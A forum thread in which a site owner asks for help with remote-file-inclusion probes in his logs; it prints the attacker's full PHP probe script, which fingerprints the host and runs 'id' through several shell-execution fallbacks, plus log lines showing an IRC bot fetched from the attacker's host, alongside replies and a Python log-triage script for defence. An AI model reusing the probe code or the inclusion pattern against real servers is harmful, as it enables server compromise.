PHP Injection Exploit

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

PHP Injection Exploit

Post by bcarpio »

I keep seeing these in my logs (xxx.xxx.xxx.xxx is my server's IP):

xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:13 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"


xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:17 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"


You will notice the 200 success code.

If you download this gambar.jpg file, you will see that it is a php script:

------- start gambar.jpg -------

<?
// Fingerprint the host: working directory, kernel string, OS name.
$dir = @getcwd();
$ker = @php_uname();
echo "3"."1"."3"."3"."7"."<br>";   // start marker; a matching one is printed at the end
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";

// Run `id` through whichever command-execution function is available.
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd;

// Try exec, shell_exec, system, passthru and finally popen in turn,
// falling through to the next one when the previous is unavailable.
function ex($cfe) {
    $res = '';
    if (!empty($cfe)) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        }
        elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        }
        elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = "";
            while (!@feof($f)) { $res .= @fread($f, 1024); }
            @pclose($f);
        }
    }
    return $res;
}

// Human-readable size for the free-space line.
function view_size($size) {
    if (!is_numeric($size)) { return FALSE; }
    else {
        if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
        elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
        elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
        else {$size = $size . " B";}
        return $size;
    }
}

echo "<br>3"."1"."2"."3"."4<br>";   // end marker
?>
--------------------------------------------

My hosting company has alerted me to this issue. I'm not sure what this script does that allows for a PHP injection, if anything... if someone can help me put the pieces together, that would be great.
Weirdan
Moderator
Posts: 5978
Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine

Re: PHP Injection Exploit

Post by Weirdan »

Are you running aMember Pro?
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

Re: PHP Injection Exploit

Post by bcarpio »

No,

There are hundreds of log entries from the attacker searching for everything from aMember Pro to phpBB... but I am not running any of them. The thing is that the site that shows the 200 is just a static HTML site. The rest of my sites run Joomla, but I don't see any of these in the logs for the sites running Joomla.

The other odd thing is that the pk.txt file is uploaded to /tmp/.ICE-unix
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: PHP Injection Exploit

Post by Mordred »

1. It's getting a 200 because it's requesting / (which exists).
The other text is after the ?, meaning it's part of the query string.

2. Have you tried accessing the same URL on your server to see what happens? My guess is - nothing.
It's just a stupid bot trying its luck with you.

3. Wait... what pk.txt ?
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

Re: PHP Injection Exploit

Post by bcarpio »

Yes, I believe that this script hidden in gambar.jpg is somehow allowing my server to be exploited. See:
http://imoet.100webspace.net/gambar.jpg

Now let me show you an excerpt from my error_log:

-------------------------------------------

error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--04:48:44-- http://imoet.100webspace.net/pk.txt
Resolving imoet.100webspace.net... 64.72.112.169
Connecting to imoet.100webspace.net|64.72.112.169|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84143 (82K) [text/plain]
Saving to: `pk.txt'

0K .......... .......... .......... .......... .......... 60% 239K 0s
50K .......... .......... .......... .. 100% 622K=0.3s

04:48:44 (315 KB/s) - `pk.txt' saved [84143/84143]

error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key

-----------------------------------

You can see that this site is somehow exploiting my server to upload a pk.txt file. This pk.txt file is an IRC bot which is eventually used to attack other sites, but I assume that the initial attack begins with gambar.jpg.
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: PHP Injection Exploit

Post by Mordred »

1. Disable this if you're not using it:
http://bg.php.net/manual/en/ref.filesys ... -url-fopen

2. Copy your logs aside and collect all occurrences like the ones you showed us. Maybe the bot is trying a few known RFI holes and finding one; figuring out which one will allow you to patch the root cause of the vulnerability.
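The two points above (a 200 on / proves nothing, and the way to find the real hole is to collect every probe and see which target script actually exists) can be turned into a small triage script. The following is an added example for this thread, not code from any poster. It assumes the Apache "combined" log format. SAMPLE_LOG is constructed: its first two lines are the probes quoted earlier with the server address replaced by 192.0.2.10, and the other two are made up (com_example and base_path are hypothetical names) to show a benign request and a probe that got a 404. The query string in the logged probe is double URL-encoded (%255b is %5b is [), so the decoder runs until the text stops changing.

```python
"""Triage Apache access-log lines for remote-file-inclusion (RFI) probes.

Added example, not from the original thread. Assumes the Apache "combined"
log format. SAMPLE_LOG is constructed (see the lead-in); com_example and
base_path are hypothetical names.
"""
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A query parameter whose value is an absolute URL is the signature of an RFI probe.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log (server IP replaced; last two lines made up).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Mar/2008:08:05:13 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"
192.0.2.10 - - [23/Mar/2008:08:05:17 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"
192.0.2.10 - - [23/Mar/2008:08:06:02 -0700] "GET /index.html HTTP/1.1" 200 7925 "-" "Mozilla/5.0"
192.0.2.10 - - [23/Mar/2008:08:07:40 -0700] "GET /components/com_example/example.php?base_path=http://imoet.100webspace.net/gambar.jpg? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
"""


def decode_fully(s, max_rounds=3):
    """Undo URL-encoding until the text stops changing. The logged probe is
    double-encoded (%255b -> %5b -> '['), so a single unquote() would leave
    the bracket escaped and hide the config[root_dir] parameter name."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_rfi_probes(line):
    """Return one finding per query parameter that carries a remote URL."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group('target'))
    findings = []
    for pair in parts.query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        name, value = decode_fully(name), decode_fully(value)
        if REMOTE_RE.match(value):
            findings.append({
                'ip': m.group('ip'),
                'ts': m.group('ts'),
                'path': parts.path,          # the script the bot hopes is vulnerable
                'param': name,
                'remote_url': value,
                # A trailing '?' makes whatever the vulnerable include appends
                # to the path become a query string on the attacker's URL.
                'trailing_qmark': value.endswith('?'),
                'status': m.group('status'),
                'ua': m.group('ua'),
            })
    return findings


def triage(log_text):
    """Scan a whole log; returns the findings in log order."""
    out = []
    for line in log_text.splitlines():
        out.extend(find_rfi_probes(line))
    return out


def summarize(findings):
    """Count probes per (path, parameter). A bot cycling through known holes
    shows up as many distinct pairs; the one worth chasing is a pair whose
    path really exists in your document root. A 200 on "/" only says the
    index page was served, not that anything was included."""
    return Counter((f['path'], f['param']) for f in findings)


if __name__ == '__main__':
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['status']} {f['path']} {f['param']}={f['remote_url']} ({f['ua']})")
    for (path, param), n in summarize(found).most_common():
        print(f"{n:3d}x {path} ?{param}=<remote url>")
```

Run it against a copy of the real access_log by replacing SAMPLE_LOG with the file contents; then check each summarized path against the document root and fetch the probed URL yourself, as suggested above, to see whether the include ever happens.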
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

Re: PHP Injection Exploit

Post by bcarpio »

Yeah, I have register_globals = Off and allow_url_fopen = Off.

I guess all I can really do is keep going through the logs and try to find a URL they passed that "worked"?

Any other suggestions?
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: PHP Injection Exploit

Post by Mordred »

If you're sure you have allow_url_fopen = Off, then the hole being exploited is NOT RFI.
Weirdan
Moderator
Posts: 5978
Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine

Re: PHP Injection Exploit

Post by Weirdan »

bcarpio wrote: Now let me show you an excerpt from my error_log:
[.................................]
--04:48:44-- http://imoet.100webspace.net/pk.txt
Resolving imoet.100webspace.net... 64.72.112.169
Connecting to imoet.100webspace.net|64.72.112.169|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84143 (82K) [text/plain]
Saving to: `pk.txt'

0K .......... .......... .......... .......... .......... 60% 239K 0s
50K .......... .......... .......... .. 100% 622K=0.3s

04:48:44 (315 KB/s) - `pk.txt' saved [84143/84143]
[...............................]
Looks like an output from wget
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

Re: PHP Injection Exploit

Post by bcarpio »

Hmm, apparently my problem is related to this:

http://www.heise-online.co.uk/security/ ... news/75459

I use Joomla on almost all of my sites. Although I am not running this "Perform" component, there must be another component that is being compromised. The odd thing is that I do have register_globals=Off in my php.ini.